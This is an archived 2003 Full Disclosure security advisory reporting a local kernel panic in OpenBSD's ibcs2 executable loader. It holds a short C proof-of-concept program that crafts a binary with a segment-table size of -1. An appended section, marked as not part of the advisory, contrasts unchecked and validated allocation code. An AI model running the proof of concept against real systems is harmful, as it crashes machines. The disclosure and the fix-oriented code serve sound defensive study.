Full Disclosure mailing list archives
OpenBSD kernel panic, yet still *BSD much better than windows
From: Georgi Guninski <guninski () guninski com>
Date: Wed, 5 Nov 2003 00:13:15 +0200
Georgi Guninski security advisory #63, 2003

OpenBSD kernel panic, yet still *BSD much better than windows

Systems affected: tested on OpenBSD 3.3 and 2.8, probably other versions also affected
Risk: Low
Date: 4 November 2003

Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre.
If you want to link to this content use the URL: http://www.guninski.com/msuxobsd1.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.

Description:
By executing a specially crafted binary it is possible to cause a kernel panic on at least OpenBSD 3.3 and 2.8.

Details:
The problem seems to be in "ibcs2_exec.c", line 619 of 738:

        /* read in segment table */
        xs = (struct xseg *)malloc(xep->xe_segsize, M_TEMP, M_WAITOK);
        error = vn_rdwr(UIO_READ, epp->ep_vp, (caddr_t)xs,

It looks like malloc can return null.

Another potential problem is in "exec_elf.c", line 792 of 827:

        np = (Elf_Note *)malloc(ph->p_filesz, M_TEMP, M_WAITOK);

The following code snippet demonstrates the problem:
------------------------------------
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
/* struct xexec, struct xext and the XOUT_MAGIC/XC_386/XE_EXEC constants live in
 * the kernel source tree under sys/compat/ibcs2/ibcs2_exec.h */
#include <compat/ibcs2/ibcs2_exec.h>

int main(int ac, char **av)
{
        int fd;
        struct xexec xp;   /* x.out main header */
        struct xext xep;   /* x.out extended header, carries xe_segsize */
        char exe[10];
        char fil[] = "./vvc";

        fd = open(fil, O_CREAT | O_RDWR, 0700);
        if (fd == -1) {
                perror("open");
                return 1;
        }
        memset(&xp, 0, sizeof(xp));
        memset(&xep, 0, sizeof(xep));
        memset(exe, 'v', sizeof(exe));

        xp.x_magic = XOUT_MAGIC;
        xp.x_cpu = XC_386;
        xp.x_renv = XE_EXEC;
        xp.x_ext = sizeof(xep);
        /* the segment table size the kernel passes straight to malloc */
        xep.xe_segsize = -1;

        write(fd, &xp, sizeof(xp));
        write(fd, &xep, sizeof(xep));
        write(fd, exe, sizeof(exe));
        close(fd);
        printf("Now exec %s\n", fil);
        return 0;
}
------------------------------------
The C proggie which demonstrates the problem is available at: http://www.guninski.com/msuxobsd.c

Note: OpenBSD's errata claims the header is invalid, though the header is believed to be valid and well formed.

Vendor status: OpenBSD was notified on Mon, 3 Nov 2003 16:04:40 +0200. The fix was available in CVS in less than 24 hours.
Fix available at http://www.openbsd.org/errata.html

Regards,
Georgi Guninski
http://www.guninski.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
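The root cause the advisory points at is a length field read from an untrusted executable header being handed directly to the kernel allocator. The following is an added userland example, not code from the advisory or from OpenBSD, showing the unchecked pattern next to a checked loader that validates the declared segment-table size before allocating anything. The header layout (`struct toy_hdr`, `TOY_MAGIC`), the entry size and the `TOY_MAX_SEGS` ceiling are all constructed for the example and do not correspond to the real `struct xexec`/`struct xext`.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for an executable header. It is NOT the kernel's
 * struct xexec/struct xext; only the untrusted "segment table size" field
 * that the advisory points at is modelled. Two u32 fields, no padding. */
struct toy_hdr {
    uint32_t magic;    /* format identifier the exec handler matches on */
    uint32_t segsize;  /* byte size of the segment table following the header */
};

#define TOY_MAGIC     0x21594f54u   /* constructed magic value */
#define TOY_SEG_ENTRY 16u           /* bytes per segment entry (constructed) */
#define TOY_MAX_SEGS  256u          /* ceiling a loader would accept (hypothetical) */

enum load_status {
    LOAD_OK = 0,
    LOAD_SHORT,        /* image too small for the header or the declared table */
    LOAD_BAD_MAGIC,    /* not this format: let another exec handler try */
    LOAD_BAD_SEGSIZE,  /* declared table size fails validation */
    LOAD_NOMEM
};

/* Unchecked pattern, mirroring the quoted kernel line: the size field goes
 * from the file straight into the allocator. With segsize = 0xffffffff this
 * is a ~4 GiB request; userland malloc(3) may fail or succeed depending on
 * the platform, while the kernel allocator in the advisory panics. Kept for
 * contrast only. */
uint8_t *load_segtable_unchecked(const uint8_t *img, size_t len) {
    struct toy_hdr h;
    if (len < sizeof h) return NULL;
    memcpy(&h, img, sizeof h);
    uint8_t *t = malloc(h.segsize);
    if (t != NULL) memcpy(t, img + sizeof h, h.segsize);
    return t;
}

/* Checked pattern: validate the size field against an absolute ceiling, the
 * entry granularity and the bytes actually present in the image before any
 * allocation happens. On LOAD_OK, *table is malloc'd (caller frees) and
 * *nsegs holds the entry count. */
enum load_status load_segtable(const uint8_t *img, size_t len,
                               uint8_t **table, size_t *nsegs) {
    struct toy_hdr h;
    if (len < sizeof h) return LOAD_SHORT;
    memcpy(&h, img, sizeof h);
    if (h.magic != TOY_MAGIC) return LOAD_BAD_MAGIC;

    /* Reject 0, non-multiples of the entry size and anything above the
     * ceiling. Dividing first keeps the comparison free of overflow. */
    if (h.segsize == 0 || h.segsize % TOY_SEG_ENTRY != 0 ||
        h.segsize / TOY_SEG_ENTRY > TOY_MAX_SEGS)
        return LOAD_BAD_SEGSIZE;

    /* The table must be fully contained in the file (len >= sizeof h here). */
    if (h.segsize > len - sizeof h) return LOAD_SHORT;

    uint8_t *t = malloc(h.segsize);
    if (t == NULL) return LOAD_NOMEM;
    memcpy(t, img + sizeof h, h.segsize);
    *table = t;
    *nsegs = h.segsize / TOY_SEG_ENTRY;
    return LOAD_OK;
}

/* Builds a constructed image: a header whose segsize field is `declared`,
 * followed by `actual` filler bytes. Returns the image length, 0 if it
 * does not fit in buf. */
size_t build_image(uint8_t *buf, size_t bufsize, uint32_t declared, size_t actual) {
    struct toy_hdr h = { TOY_MAGIC, declared };
    if (bufsize < sizeof h + actual) return 0;
    memcpy(buf, &h, sizeof h);
    memset(buf + sizeof h, 'v', actual);
    return sizeof h + actual;
}

int main(void) {
    uint8_t img[256];
    uint8_t *table = NULL;
    size_t nsegs = 0;

    /* Well-formed image: two 16-byte segment entries. */
    size_t len = build_image(img, sizeof img, 2 * TOY_SEG_ENTRY, 2 * TOY_SEG_ENTRY);
    printf("valid image: status %d, segments %zu\n",
           load_segtable(img, len, &table, &nsegs), nsegs);
    free(table);
    free(load_segtable_unchecked(img, len));  /* same image, unchecked path */

    /* Header declaring segsize = -1 (0xffffffff), as in the advisory's PoC:
     * rejected before the allocator is ever reached. */
    len = build_image(img, sizeof img, 0xffffffffu, 2 * TOY_SEG_ENTRY);
    printf("segsize=-1 image: status %d\n", load_segtable(img, len, &table, &nsegs));
    return 0;
}
```

The checks are ordered so that a file that is not this format is handed back (`LOAD_BAD_MAGIC`) before any field is interpreted, and the size field is bounded both by a fixed ceiling and by the bytes actually present; only after both pass does the allocator see the value.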
Current thread:
- OpenBSD kernel panic, yet still *BSD much better than windows Georgi Guninski (Nov 04)
- Re: OpenBSD kernel panic, yet still *BSD much better than windows Georgi Guninski (Nov 05)